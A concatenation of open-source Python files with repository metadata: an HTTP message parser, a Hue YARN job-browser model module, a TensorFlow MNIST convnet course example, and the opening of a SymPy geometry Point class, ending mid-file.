name, value = line.split(':', 1)
name = name.strip()
value = value.strip()
self.trailers.append((name, value))
def add_header(self, name, value):
self.headers.append((name, value))
def add_header_line(self, line):
if line.startswith(' ') or line.startswith('\t'):
k, v = self.headers.pop()
line = line.strip()
v = "%s %s" % (v, line)
self.add_header(k, v)
elif line in NEWLINES:
for name, value in self.headers:
name = name.lower()
value = value.lower()
# todo handle multiple instances
# of these headers
if name in self.ignore_headers:
#print >> sys.stderr, 'ignore', name
pass
elif name == 'expect':
if '100-continue' in value:
self.expect_continue = True
elif name == 'content-length':
if self.mode == 'close':
self.content_length = int(value)
self.mode = 'length'
elif name == 'transfer-encoding':
if 'chunked' in value:
self.mode = 'chunked'
elif name == 'content-encoding':
self.encoding = value
elif name == 'connection':
if 'keep-alive' in value:
self.keep_alive = True
elif 'close' in value:
self.keep_alive = False
else:
#print line
name, value = line.split(':', 1)
name = name.strip()
value = value.strip()
self.add_header(name, value)
def body_is_chunked(self):
return self.mode == 'chunked'
def body_length(self):
if self.mode == 'length':
return self.content_length
url_rx = re.compile(
'(?P<scheme>https?)://(?P<authority>(?P<host>[^:/]+)(?::(?P<port>\d+))?)'
'(?P<path>.*)',
re.I)
class RequestHeader(HTTPHeader):
def __init__(self, ignore_headers=()):
HTTPHeader.__init__(self, ignore_headers=ignore_headers)
self.method = ''
self.target_uri = ''
self.version = ''
self.host = ''
self.scheme = 'http'
self.port = 80
self.host = ''
def set_start_line(self, line):
self.method, self.target_uri, self.version = \
line.rstrip().split(' ', 2)
if self.method.upper() == "CONNECT":
# target_uri = host:port
self.host, self.port = self.target_uri.split(':')
else:
match = url_rx.match(self.target_uri)
if match:
#self.add_header('Host', match.group('authority'))
self.target_uri = match.group('path')
self.host = match.group('host')
port = match.group('port')
self.port = int(port) if port else 80
self.scheme = match.group('scheme')
if not self.target_uri:
if self.method.upper() == 'OPTIONS':
self.target_uri = '*'
else:
self.target_uri = '/'
if self.version == 'HTTP/1.0':
self.keep_alive = False
def has_body(self):
return self.mode in ('chunked', 'length')
def write_decoded_start(self, buf):
buf.extend('%s %s %s\r\n' % (self.method,
self.target_uri,
self.version))
class ResponseHeader(HTTPHeader):
def __init__(self, request, ignore_headers=()):
HTTPHeader.__init__(self, ignore_headers=ignore_headers)
self.request = request
self.version = "HTTP/1.1"
self.code = 0
self.phrase = "Empty Response"
@property
def method(self):
return self.request.method
@property
def url(self):
return self.request.url
@property
def host(self):
return self.request.host
@property
def port(self):
return self.request.port
@property
def scheme(self):
return self.request.scheme
def set_start_line(self, line):
parts = line.rstrip().split(' ', 2)
self.version, self.code = parts[:2]
self.phrase = parts[2] if len(parts) >= 3 else ""
self.code = int(self.code)
if self.version == 'HTTP/1.0':
self.keep_alive = False
def has_body(self):
if self.request.method in Methods.no_body:
return False
elif self.code in Codes.no_body:
return False
return True
def write_decoded_start(self, buf):
buf.extend('%s %d %s\r\n' % (self.version, self.code, self.phrase))
class RequestMessage(HTTPMessage):
CONTENT_TYPE = "%s;msgtype=request" % HTTPMessage.CONTENT_TYPE
def __init__(self, ignore_headers=()):
HTTPMessage.__init__(self,
RequestHeader(ignore_headers=ignore_headers))
class ResponseMessage(HTTPMessage):
CONTENT_TYPE = "%s;msgtype=response" % HTTPMessage.CONTENT_TYPE
def __init__(self, request, ignore_headers=()):
self.interim = []
HTTPMessage.__init__(self,
ResponseHeader(request.header,
ignore_headers=ignore_headers))
def got_continue(self):
return bool(self.interim)
@property
def code(self):
return self.header.code
def feed(self, text):
text = HTTPMessage.feed(self, text)
if self.complete() and self.header.code == Codes.Continue:
self.interim.append(self.header)
self.header = ResponseHeader(self.header.request)
self.body_chunks = []
self.mode = 'start'
self.body_reader = None
text = HTTPMessage.feed(self, text)
return text
|
{
"content_hash": "a2f010b8f1fa819fa0e0d01a32aab855",
"timestamp": "",
"source": "github",
"line_count": 584,
"max_line_length": 79,
"avg_line_length": 30.85958904109589,
"alnum_prop": 0.517367661746754,
"repo_name": "alard/warctozip",
"id": "fa070747b577ce1c46dfbfe178606c26f9584d0a",
"size": "18022",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "hanzo/httptools/messaging.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "85862"
}
],
"symlink_target": ""
}
|
import logging
import re
import time
import urlparse
import urllib2
from lxml import html
from django.utils.translation import ugettext as _
from desktop.lib.rest.resource import Resource
from desktop.lib.view_util import format_duration_in_millis
from hadoop.yarn.clients import get_log_client
from jobbrowser.models import format_unixtime_ms
LOGGER = logging.getLogger(__name__)
class Application(object):
def __init__(self, attrs, rm_api=None):
self.api = rm_api
for attr in attrs.keys():
setattr(self, attr, attrs[attr])
self._fixup()
def _fixup(self):
self.is_mr2 = True
jobid = self.id
if self.state in ('FINISHED', 'FAILED', 'KILLED'):
setattr(self, 'status', self.finalStatus)
else:
setattr(self, 'status', self.state)
setattr(self, 'jobId', jobid)
setattr(self, 'jobId_short', re.sub('(application|job)_', '', self.jobId))
setattr(self, 'jobName', self.name)
setattr(self, 'is_retired', False)
setattr(self, 'maps_percent_complete', self.progress)
setattr(self, 'reduces_percent_complete', self.progress)
setattr(self, 'queueName', self.queue)
setattr(self, 'priority', '')
if self.finishedTime == 0:
finishTime = int(time.time() * 1000)
else:
finishTime = self.finishedTime
setattr(self, 'durationInMillis', finishTime - self.startedTime)
setattr(self, 'startTimeMs', self.startedTime)
setattr(self, 'startTimeFormatted', format_unixtime_ms(self.startedTime))
setattr(self, 'finishTimeFormatted', format_unixtime_ms(finishTime))
setattr(self, 'finishedMaps', None)
setattr(self, 'desiredMaps', None)
setattr(self, 'finishedReduces', None)
setattr(self, 'desiredReduces', None)
setattr(self, 'durationFormatted', format_duration_in_millis(self.durationInMillis))
for attr in ['preemptedResourceVCores', 'vcoreSeconds', 'memorySeconds', 'diagnostics']:
if not hasattr(self, attr):
setattr(self, attr, 'N/A')
if not hasattr(self, 'acls'):
setattr(self, 'acls', {})
# YARN returns a N/A url if it's not set.
if not hasattr(self, 'trackingUrl') or self.trackingUrl == 'http://N/A':
self.trackingUrl = None
def kill(self):
return self.api.kill(self.id)
def filter_tasks(self, *args, **kwargs):
return []
class SparkJob(Application):
def __init__(self, job, api=None):
super(SparkJob, self).__init__(job, api)
self._scrape()
def _history_application_metrics(self, html_doc):
metrics = []
root = html.fromstring(html_doc)
tables = root.findall('.//table')
metrics_table = tables[2].findall('.//tr')
for tr in metrics_table:
header = tr.find('.//th')
value = tr.findall('.//td')
if value:
header = header.text.strip().replace(':', '')
value = value[0].text.strip()
metrics.append({
'header': header,
'value': value
})
return metrics
def _scrape(self):
# XXX: we have to scrape the tracking URL directly because
# spark jobs don't have a JSON api via YARN or app server
# see YARN-1530, SPARK-1537 for progress on these apis
self.scrapedData = {}
try:
res = urllib2.urlopen(self.trackingUrl)
html_doc = res.read()
if self.trackingUI == 'History':
self.scrapedData['metrics'] = self._history_application_metrics(html_doc)
except Exception, e:
# Prevent a nosedive. Don't create metrics if api changes or url is unreachable.
self.scrapedData['metrics'] = []
class Job(object):
def __init__(self, api, attrs):
self.api = api
self.is_mr2 = True
for attr in attrs.keys():
if attr == 'acls':
# 'acls' are actually not available in the API
LOGGER.warn('Not using attribute: %s' % attrs[attr])
else:
setattr(self, attr, attrs[attr])
self._fixup()
# Set MAPS/REDUCES completion percentage
if hasattr(self, 'mapsTotal'):
self.desiredMaps = self.mapsTotal
if self.desiredMaps == 0:
self.maps_percent_complete = 0
else:
self.maps_percent_complete = int(round(float(self.finishedMaps) / self.desiredMaps * 100))
if hasattr(self, 'reducesTotal'):
self.desiredReduces = self.reducesTotal
if self.desiredReduces == 0:
self.reduces_percent_complete = 0
else:
self.reduces_percent_complete = int(round(float(self.finishedReduces) / self.desiredReduces * 100))
def _fixup(self):
jobid = self.id
setattr(self, 'status', self.state)
setattr(self, 'jobId', jobid)
setattr(self, 'jobId_short', self.jobId.replace('job_', ''))
setattr(self, 'is_retired', False)
setattr(self, 'maps_percent_complete', None)
setattr(self, 'reduces_percent_complete', None)
setattr(self, 'duration', self.finishTime - self.startTime)
setattr(self, 'durationFormatted', format_duration_in_millis(self.duration))
setattr(self, 'finishTimeFormatted', format_unixtime_ms(self.finishTime))
setattr(self, 'startTimeFormatted', format_unixtime_ms(self.startTime))
setattr(self, 'finishedMaps', self.mapsCompleted)
setattr(self, 'desiredMaps', 0)
setattr(self, 'finishedReduces', self.reducesCompleted)
setattr(self, 'desiredReduces', 0)
setattr(self, 'applicationType', 'MR2')
def kill(self):
return self.api.kill(self.id)
@property
def counters(self):
counters = self.api.counters(self.id)
if counters:
return counters['jobCounters']
else:
return None
@property
def acls(self):
if not hasattr(self, '_acls'):
self._acls = dict([(name, self.conf_keys[name]) for name in self.conf_keys if 'acl' in name])
return self._acls
@property
def full_job_conf(self):
if not hasattr(self, '_full_job_conf'):
self._full_job_conf = self.api.conf(self.id)['conf']
return self._full_job_conf
@property
def conf_keys(self):
return dict([(line['name'], line['value']) for line in self.full_job_conf['property']])
def get_task(self, task_id):
json = self.api.task(self.id, task_id)['task']
return Task(self, json)
def filter_tasks(self, task_types=None, task_states=None, task_text=None):
return [Task(self, task) for task in self.api.tasks(self.id).get('tasks', {}).get('task', [])
if (not task_types or task['type'].lower() in task_types) and
(not task_states or task['state'].lower() in task_states) and
(not task_text or task_text.lower() in str(task).lower())]
@property
def job_attempts(self):
if not hasattr(self, '_job_attempts'):
self._job_attempts = self.api.job_attempts(self.id)['jobAttempts']
return self._job_attempts
class KilledJob(Job):
def __init__(self, api, attrs):
self._fixup()
super(KilledJob, self).__init__(api, attrs)
if not hasattr(self, 'finishTime'):
setattr(self, 'finishTime', self.finishedTime)
if not hasattr(self, 'startTime'):
setattr(self, 'startTime', self.startedTime)
super(KilledJob, self)._fixup()
setattr(self, 'jobId_short', self.jobId.replace('application_', ''))
def _fixup(self):
if not hasattr(self, 'mapsCompleted'):
setattr(self, 'mapsCompleted', 0)
if not hasattr(self, 'reducesCompleted'):
setattr(self, 'reducesCompleted', 0)
@property
def counters(self):
return {}
@property
def full_job_conf(self):
return {'property': []}
def filter_tasks(self, task_types=None, task_states=None, task_text=None):
return []
@property
def job_attempts(self):
return {'jobAttempt': []}
class Task:
def __init__(self, job, attrs):
self.job = job
if attrs:
for key, value in attrs.iteritems():
setattr(self, key, value)
self.is_mr2 = True
self._fixup()
def _fixup(self):
setattr(self, 'jobId', self.job.jobId)
setattr(self, 'taskId', self.id)
setattr(self, 'taskId_short', self.id)
setattr(self, 'taskType', self.type)
setattr(self, 'execStartTimeMs', self.startTime)
setattr(self, 'mostRecentState', self.state)
setattr(self, 'execStartTimeFormatted', format_unixtime_ms(self.startTime))
setattr(self, 'execFinishTimeFormatted', format_unixtime_ms(self.finishTime))
setattr(self, 'startTimeFormatted', format_unixtime_ms(self.startTime))
setattr(self, 'progress', self.progress / 100)
@property
def attempts(self):
# We can cache as we deal with history server
if not hasattr(self, '_attempts'):
task_attempts = self.job.api.task_attempts(self.job.id, self.id)['taskAttempts']
if task_attempts:
self._attempts = [Attempt(self, attempt) for attempt in task_attempts['taskAttempt']]
else:
self._attempts = []
return self._attempts
@property
def taskAttemptIds(self):
if not hasattr(self, '_taskAttemptIds'):
self._taskAttemptIds = [attempt.id for attempt in self.attempts]
return self._taskAttemptIds
@property
def counters(self):
if not hasattr(self, '_counters'):
self._counters = self.job.api.task_counters(self.jobId, self.id)['jobTaskCounters']
return self._counters
def get_attempt(self, attempt_id):
json = self.job.api.task_attempt(self.jobId, self.id, attempt_id)['taskAttempt']
return Attempt(self, json)
class Attempt:
def __init__(self, task, attrs):
self.task = task
if attrs:
for key, value in attrs.iteritems():
setattr(self, key, value)
self.is_mr2 = True
self._fixup()
def _fixup(self):
setattr(self, 'attemptId', self.id)
setattr(self, 'attemptId_short', self.id)
setattr(self, 'taskTrackerId', getattr(self, 'assignedContainerId', None))
setattr(self, 'startTimeFormatted', format_unixtime_ms(self.startTime))
setattr(self, 'finishTimeFormatted', format_unixtime_ms(self.finishTime))
setattr(self, 'outputSize', None)
setattr(self, 'phase', None)
setattr(self, 'shuffleFinishTimeFormatted', None)
setattr(self, 'sortFinishTimeFormatted', None)
setattr(self, 'mapFinishTimeFormatted', None)
setattr(self, 'progress', self.progress / 100)
if not hasattr(self, 'diagnostics'):
self.diagnostics = ''
if not hasattr(self, 'assignedContainerId'):
setattr(self, 'assignedContainerId', '')
@property
def counters(self):
if not hasattr(self, '_counters'):
self._counters = self.task.job.api.task_attempt_counters(self.task.jobId, self.task.id, self.id)['jobCounters']
return self._counters
def get_task_log(self, offset=0):
logs = []
attempt = self.task.job.job_attempts['jobAttempt'][-1]
log_link = attempt['logsLink']
# Get MR task logs
if self.assignedContainerId:
log_link = log_link.replace(attempt['containerId'], self.assignedContainerId)
if hasattr(self, 'nodeHttpAddress'):
log_link = log_link.replace(attempt['nodeHttpAddress'].split(':')[0], self.nodeHttpAddress.split(':')[0])
for name in ('stdout', 'stderr', 'syslog'):
link = '/%s/' % name
params = {}
if int(offset) >= 0:
params['start'] = offset
try:
log_link = re.sub('job_[^/]+', self.id, log_link)
root = Resource(get_log_client(log_link), urlparse.urlsplit(log_link)[2], urlencode=False)
response = root.get(link, params=params)
log = html.fromstring(response, parser=html.HTMLParser()).xpath('/html/body/table/tbody/tr/td[2]')[0].text_content()
except Exception, e:
log = _('Failed to retrieve log: %s' % e)
try:
debug_info = '\nLog Link: %s' % log_link
debug_info += '\nHTML Response: %s' % response
LOGGER.error(debug_info)
except:
LOG.exception('failed to build debug info')
logs.append(log)
return logs + [''] * (3 - len(logs))
class Container:
def __init__(self, attrs):
if attrs:
for key, value in attrs['container'].iteritems():
setattr(self, key, value)
self.is_mr2 = True
self._fixup()
def _fixup(self):
setattr(self, 'trackerId', self.id)
setattr(self, 'httpPort', self.nodeId.split(':')[1])
setattr(self, 'host', self.nodeId.split(':')[0])
setattr(self, 'lastSeenMs', None)
setattr(self, 'lastSeenFormatted', '')
setattr(self, 'totalVirtualMemory', None)
setattr(self, 'totalPhysicalMemory', self.totalMemoryNeededMB)
setattr(self, 'availableSpace', None)
setattr(self, 'failureCount', None)
setattr(self, 'mapCount', None)
setattr(self, 'reduceCount', None)
setattr(self, 'maxMapTasks', None)
setattr(self, 'maxReduceTasks', None)
setattr(self, 'taskReports', None)
|
{
"content_hash": "de4855a1d07b854aa61593a57259983f",
"timestamp": "",
"source": "github",
"line_count": 391,
"max_line_length": 124,
"avg_line_length": 32.41943734015345,
"alnum_prop": 0.6491795519091196,
"repo_name": "keedio/hue",
"id": "c615baca506be3f304bd338cc804a98156e321f6",
"size": "13468",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "apps/jobbrowser/src/jobbrowser/yarn_models.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ABAP",
"bytes": "962"
},
{
"name": "ActionScript",
"bytes": "1133"
},
{
"name": "Ada",
"bytes": "99"
},
{
"name": "Assembly",
"bytes": "506"
},
{
"name": "AutoHotkey",
"bytes": "720"
},
{
"name": "Batchfile",
"bytes": "13945"
},
{
"name": "C",
"bytes": "2374521"
},
{
"name": "C#",
"bytes": "83"
},
{
"name": "C++",
"bytes": "195135"
},
{
"name": "COBOL",
"bytes": "4"
},
{
"name": "CSS",
"bytes": "749764"
},
{
"name": "Cirru",
"bytes": "520"
},
{
"name": "Clojure",
"bytes": "794"
},
{
"name": "CoffeeScript",
"bytes": "403"
},
{
"name": "ColdFusion",
"bytes": "86"
},
{
"name": "Common Lisp",
"bytes": "632"
},
{
"name": "D",
"bytes": "324"
},
{
"name": "Dart",
"bytes": "489"
},
{
"name": "Dockerfile",
"bytes": "2493"
},
{
"name": "Eiffel",
"bytes": "375"
},
{
"name": "Elixir",
"bytes": "692"
},
{
"name": "Elm",
"bytes": "487"
},
{
"name": "Emacs Lisp",
"bytes": "12145"
},
{
"name": "Erlang",
"bytes": "487"
},
{
"name": "Forth",
"bytes": "979"
},
{
"name": "FreeMarker",
"bytes": "1017"
},
{
"name": "G-code",
"bytes": "521"
},
{
"name": "GLSL",
"bytes": "512"
},
{
"name": "Genshi",
"bytes": "946"
},
{
"name": "Gherkin",
"bytes": "699"
},
{
"name": "Go",
"bytes": "641"
},
{
"name": "Groovy",
"bytes": "1080"
},
{
"name": "HTML",
"bytes": "22468617"
},
{
"name": "Haskell",
"bytes": "512"
},
{
"name": "Haxe",
"bytes": "447"
},
{
"name": "Io",
"bytes": "140"
},
{
"name": "JSONiq",
"bytes": "4"
},
{
"name": "Java",
"bytes": "135456"
},
{
"name": "JavaScript",
"bytes": "13979183"
},
{
"name": "Julia",
"bytes": "210"
},
{
"name": "LSL",
"bytes": "2080"
},
{
"name": "Lean",
"bytes": "213"
},
{
"name": "Liquid",
"bytes": "1883"
},
{
"name": "LiveScript",
"bytes": "5747"
},
{
"name": "Lua",
"bytes": "981"
},
{
"name": "M4",
"bytes": "1377"
},
{
"name": "MATLAB",
"bytes": "203"
},
{
"name": "Makefile",
"bytes": "116341"
},
{
"name": "Mako",
"bytes": "2173008"
},
{
"name": "Mask",
"bytes": "597"
},
{
"name": "Myghty",
"bytes": "936"
},
{
"name": "Nix",
"bytes": "2212"
},
{
"name": "OCaml",
"bytes": "539"
},
{
"name": "Objective-C",
"bytes": "2672"
},
{
"name": "OpenSCAD",
"bytes": "333"
},
{
"name": "PHP",
"bytes": "351"
},
{
"name": "PLSQL",
"bytes": "13774"
},
{
"name": "PLpgSQL",
"bytes": "2547"
},
{
"name": "Pascal",
"bytes": "1412"
},
{
"name": "Perl",
"bytes": "139388"
},
{
"name": "PigLatin",
"bytes": "371"
},
{
"name": "PowerShell",
"bytes": "418"
},
{
"name": "Python",
"bytes": "33019051"
},
{
"name": "R",
"bytes": "2445"
},
{
"name": "Roff",
"bytes": "14877"
},
{
"name": "Ruby",
"bytes": "531"
},
{
"name": "Rust",
"bytes": "495"
},
{
"name": "Scala",
"bytes": "176740"
},
{
"name": "Scheme",
"bytes": "559"
},
{
"name": "Shell",
"bytes": "89251"
},
{
"name": "Smarty",
"bytes": "130"
},
{
"name": "TSQL",
"bytes": "696"
},
{
"name": "Tcl",
"bytes": "899"
},
{
"name": "TeX",
"bytes": "127765"
},
{
"name": "Thrift",
"bytes": "101931"
},
{
"name": "TypeScript",
"bytes": "1607"
},
{
"name": "VHDL",
"bytes": "830"
},
{
"name": "Vala",
"bytes": "485"
},
{
"name": "Verilog",
"bytes": "274"
},
{
"name": "Visual Basic",
"bytes": "938"
},
{
"name": "XQuery",
"bytes": "114"
},
{
"name": "XSLT",
"bytes": "357625"
},
{
"name": "sed",
"bytes": "107"
}
],
"symlink_target": ""
}
|
""" Using convolutional net on MNIST dataset of handwritten digits
MNIST dataset: http://yann.lecun.com/exdb/mnist/
CS 20: "TensorFlow for Deep Learning Research"
cs20.stanford.edu
Chip Huyen (chiphuyen@cs.stanford.edu)
Lecture 07
"""
import os
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
import time
import tensorflow as tf
import utils
class ConvNet(object):
def __init__(self):
self.lr = 0.001
self.batch_size = 128
self.keep_prob = tf.constant(0.75)
self.gstep = tf.Variable(0, dtype=tf.int32,
trainable=False, name='global_step')
self.n_classes = 10
self.skip_step = 20
self.n_test = 10000
self.training=False
def get_data(self):
with tf.name_scope('data'):
train_data, test_data = utils.get_mnist_dataset(self.batch_size)
iterator = tf.data.Iterator.from_structure(train_data.output_types,
train_data.output_shapes)
img, self.label = iterator.get_next()
self.img = tf.reshape(img, shape=[-1, 28, 28, 1])
# reshape the image to make it work with tf.nn.conv2d
self.train_init = iterator.make_initializer(train_data) # initializer for train_data
self.test_init = iterator.make_initializer(test_data) # initializer for train_data
def inference(self):
conv1 = tf.layers.conv2d(inputs=self.img,
filters=32,
kernel_size=[5, 5],
padding='SAME',
activation=tf.nn.relu,
name='conv1')
pool1 = tf.layers.max_pooling2d(inputs=conv1,
pool_size=[2, 2],
strides=2,
name='pool1')
conv2 = tf.layers.conv2d(inputs=pool1,
filters=64,
kernel_size=[5, 5],
padding='SAME',
activation=tf.nn.relu,
name='conv2')
pool2 = tf.layers.max_pooling2d(inputs=conv2,
pool_size=[2, 2],
strides=2,
name='pool2')
feature_dim = pool2.shape[1] * pool2.shape[2] * pool2.shape[3]
pool2 = tf.reshape(pool2, [-1, feature_dim])
fc = tf.layers.dense(pool2, 1024, activation=tf.nn.relu, name='fc')
dropout = tf.layers.dropout(fc,
self.keep_prob,
training=self.training,
name='dropout')
self.logits = tf.layers.dense(dropout, self.n_classes, name='logits')
def loss(self):
'''
define loss function
use softmax cross entropy with logits as the loss function
compute mean cross entropy, softmax is applied internally
'''
#
with tf.name_scope('loss'):
entropy = tf.nn.softmax_cross_entropy_with_logits(labels=self.label, logits=self.logits)
self.loss = tf.reduce_mean(entropy, name='loss')
def optimize(self):
'''
Define training op
using Adam Gradient Descent to minimize cost
'''
self.opt = tf.train.AdamOptimizer(self.lr).minimize(self.loss,
global_step=self.gstep)
def summary(self):
'''
Create summaries to write on TensorBoard
'''
with tf.name_scope('summaries'):
tf.summary.scalar('loss', self.loss)
tf.summary.scalar('accuracy', self.accuracy)
tf.summary.histogram('histogram loss', self.loss)
self.summary_op = tf.summary.merge_all()
def eval(self):
'''
Count the number of right predictions in a batch
'''
with tf.name_scope('predict'):
preds = tf.nn.softmax(self.logits)
correct_preds = tf.equal(tf.argmax(preds, 1), tf.argmax(self.label, 1))
self.accuracy = tf.reduce_sum(tf.cast(correct_preds, tf.float32))
def build(self):
'''
Build the computation graph
'''
self.get_data()
self.inference()
self.loss()
self.optimize()
self.eval()
self.summary()
def train_one_epoch(self, sess, saver, init, writer, epoch, step):
start_time = time.time()
sess.run(init)
self.training = True
total_loss = 0
n_batches = 0
try:
while True:
_, l, summaries = sess.run([self.opt, self.loss, self.summary_op])
writer.add_summary(summaries, global_step=step)
if (step + 1) % self.skip_step == 0:
print('Loss at step {0}: {1}'.format(step, l))
step += 1
total_loss += l
n_batches += 1
except tf.errors.OutOfRangeError:
pass
saver.save(sess, 'checkpoints/convnet_layers/mnist-convnet', step)
print('Average loss at epoch {0}: {1}'.format(epoch, total_loss/n_batches))
print('Took: {0} seconds'.format(time.time() - start_time))
return step
def eval_once(self, sess, init, writer, epoch, step):
start_time = time.time()
sess.run(init)
self.training = False
total_correct_preds = 0
try:
while True:
accuracy_batch, summaries = sess.run([self.accuracy, self.summary_op])
writer.add_summary(summaries, global_step=step)
total_correct_preds += accuracy_batch
except tf.errors.OutOfRangeError:
pass
print('Accuracy at epoch {0}: {1} '.format(epoch, total_correct_preds/self.n_test))
print('Took: {0} seconds'.format(time.time() - start_time))
def train(self, n_epochs):
'''
The train function alternates between training one epoch and evaluating
'''
utils.safe_mkdir('checkpoints')
utils.safe_mkdir('checkpoints/convnet_layers')
writer = tf.summary.FileWriter('./graphs/convnet_layers', tf.get_default_graph())
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
saver = tf.train.Saver()
ckpt = tf.train.get_checkpoint_state(os.path.dirname('checkpoints/convnet_layers/checkpoint'))
if ckpt and ckpt.model_checkpoint_path:
saver.restore(sess, ckpt.model_checkpoint_path)
step = self.gstep.eval()
for epoch in range(n_epochs):
step = self.train_one_epoch(sess, saver, self.train_init, writer, epoch, step)
self.eval_once(sess, self.test_init, writer, epoch, step)
writer.close()
if __name__ == '__main__':
model = ConvNet()
model.build()
model.train(n_epochs=15)
|
{
"content_hash": "09f331400e77f907595fe1730af54a06",
"timestamp": "",
"source": "github",
"line_count": 184,
"max_line_length": 106,
"avg_line_length": 38.92934782608695,
"alnum_prop": 0.5253385453022477,
"repo_name": "YeEmrick/learning",
"id": "966945ca25578acb2a2935ece7b7effaa1dae848",
"size": "7163",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "stanford-tensorflow/examples/07_convnet_layers.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "359916"
},
{
"name": "Batchfile",
"bytes": "6028"
},
{
"name": "HTML",
"bytes": "63684"
},
{
"name": "Java",
"bytes": "94996"
},
{
"name": "Jupyter Notebook",
"bytes": "3342856"
},
{
"name": "Matlab",
"bytes": "814792"
},
{
"name": "Perl",
"bytes": "380"
},
{
"name": "Python",
"bytes": "776765"
},
{
"name": "R",
"bytes": "373"
},
{
"name": "Scala",
"bytes": "58686"
},
{
"name": "Scilab",
"bytes": "128976"
},
{
"name": "Shell",
"bytes": "23036"
}
],
"symlink_target": ""
}
|
"""Geometrical Points.
Contains
--------
Point
"""
from sympy.core import S, sympify
from sympy.core.compatibility import iterable
from sympy.simplify import simplify
from sympy.geometry.exceptions import GeometryError
from sympy.functions.elementary.miscellaneous import sqrt
from entity import GeometryEntity
class Point(GeometryEntity):
"""A point in a 2-dimensional Euclidean space.
Parameters
----------
coords : sequence of 2 coordinate values.
Attributes
----------
coordinates : 2-tuple of numbers or sympy objects.
Stored in `self`. That is self[0] is the first coordinate value, and
self[1] is the second coordinate value.
Raises
------
NotImplementedError
When trying to create a point with more than two dimensions.
When `intersection` is called with object other than a Point.
TypeError
When trying to add or subtract points with different dimensions.
Notes
-----
Currently only 2-dimensional points are supported.
Examples
--------
>>> from sympy.geometry import Point
>>> from sympy.abc import x
>>> Point(1, 2)
Point(1, 2)
>>> Point([1, 2])
Point(1, 2)
>>> Point(0, x)
Point(0, x)
"""
def __new__(cls, *args, **kwargs):
if iterable(args[0]):
coords = tuple([sympify(x) for x in args[0]])
else:
coords = tuple([sympify(x) for x in args])
if len(coords) != 2:
raise NotImplementedError("Only two dimensional points currently supported")
return GeometryEntity.__new__(cls, *coords)
@property
def x(self):
return self[0]
@property
def y(self):
return self[1]
@property
def free_symbols(self):
return self.x.free_symbols.union(self.y.free_symbols)
def _eval_subs(self, old, new):
return type(self)(self.x.subs(old, new), self.y.subs(old, new))
def is_collinear(*points):
"""Is a sequence of points collinear?
Test whether or not a set of points are collinear. Returns True if
the set of points are collinear, or False otherwise.
Parameters
----------
points : sequence of Point
Returns
-------
is_collinear : boolean
Notes
--------------------------
Slope is preserved everywhere on a line, so the slope between
any two points on the line should be the same. Take the first
two points, p1 and p2, and create a translated point v1
with p1 as the origin. Now for every other point we create
a translated point, vi with p1 also as the origin. Note that
these translations preserve slope since everything is
consistently translated to a new origin of p1. Since slope
is preserved then we have the following equality:
v1_slope = vi_slope
=> v1.y/v1.x = vi.y/vi.x (due to translation)
=> v1.y*vi.x = vi.y*v1.x
=> v1.y*vi.x - vi.y*v1.x = 0 (*)
Hence, if we have a vi such that the equality in (*) is False
then the points are not collinear. We do this test for every
point in the list, and if all pass then they are collinear.
Examples
--------
>>> from sympy import Point
>>> from sympy.abc import x
>>> p1, p2 = Point(0, 0), Point(1, 1)
>>> p3, p4, p5 = Point(2, 2), Point(x, x), Point(1, 2)
>>> Point.is_collinear(p1, p2, p3, p4)
True
>>> Point.is_collinear(p1, p2, p3, p5)
False
"""
if len(points) == 0:
return False
if len(points) <= 2:
return True # two points always form a line
points = [Point(a) for a in points]
# XXX Cross product is used now, but that only extends to three
# dimensions. If the concept needs to extend to greater
# dimensions then another method would have to be used
p1 = points[0]
p2 = points[1]
v1 = p2 - p1
for p3 in points[2:]:
v2 = p3 - p1
test = simplify(v1[0]*v2[1] - v1[1]*v2[0])
if simplify(test) != 0:
return False
return True
def is_concyclic(*points):
"""Is a sequence of points concyclic?
Test whether or not a sequence of points are concyclic (i.e., they lie
on a circle).
Parameters
----------
points : sequence of Points
Returns
-------
is_concyclic : boolean
True if points are concyclic, False otherwise.
Notes
-----
No points are not considered to be concyclic. One or two points
are definitely concyclic and three points are conyclic iff they
are not collinear.
For more than three points, create a circle from the first three
points. If the circle cannot be created (i.e., they are collinear)
then all of the points cannot be concyclic. If the circle is created
successfully then simply check the remaining points for containment
in the circle.
Examples
--------
>>> from sympy.geometry import Point
>>> p1, p2 = Point(-1, 0), Point(1, 0)
>>> p3, p4 = Point(0, 1), Point(-1, 2)
>>> Point.is_concyclic(p1, p2, p3)
True
>>> Point.is_concyclic(p1, p2, p3, p4)
False
"""
if len(points) == 0:
return False
if len(points) <= 2:
return True
points = [Point(p) for p in points]
if len(points) == 3:
return (not Point.is_collinear(*points))
try:
from ellipse import Circle
c = Circle(points[0], points[1], points[2])
for point in points[3:]:
if point not in c:
return False
return True
except GeometryError, e:
# Circle could not be created, because of collinearity of the
# three points passed in, hence they are not concyclic.
return False
"""
# This code is from Maple
def f(u):
dd = u[0]**2 + u[1]**2 + 1
u1 = 2*u[0] / dd
u2 = 2*u[1] / dd
u3 = (dd - 2) / dd
return u1,u2,u3
u1,u2,u3 = f(points[0])
v1,v2,v3 = f(points[1])
w1,w2,w3 = f(points[2])
p = [v1 - u1, v2 - u2, v3 - u3]
q = [w1 - u1, w2 - u2, w3 - u3]
r = [p[1]*q[2] - p[2]*q[1], p[2]*q[0] - p[0]*q[2], p[0]*q[1] - p[1]*q[0]]
for ind in xrange(3, len(points)):
s1,s2,s3 = f(points[ind])
test = simplify(r[0]*(s1-u1) + r[1]*(s2-u2) + r[2]*(s3-u3))
if test != 0:
return False
return True
"""
def distance(self, p):
"""The Euclidean distance from self to point p.
Parameters
----------
p : Point
Returns
-------
distance : number or symbolic expression.
Examples
--------
>>> from sympy.geometry import Point
>>> p1, p2 = Point(1, 1), Point(4, 5)
>>> p1.distance(p2)
5
>>> from sympy.abc import x, y
>>> p3 = Point(x, y)
>>> p3.distance(Point(0, 0))
sqrt(x**2 + y**2)
"""
return sqrt(sum([(a - b)**2 for a, b in zip(self, p)]))
def midpoint(self, p):
"""The midpoint between self and point p.
Parameters
----------
p : Point
Returns
-------
midpoint : Point
Examples
--------
>>> from sympy.geometry import Point
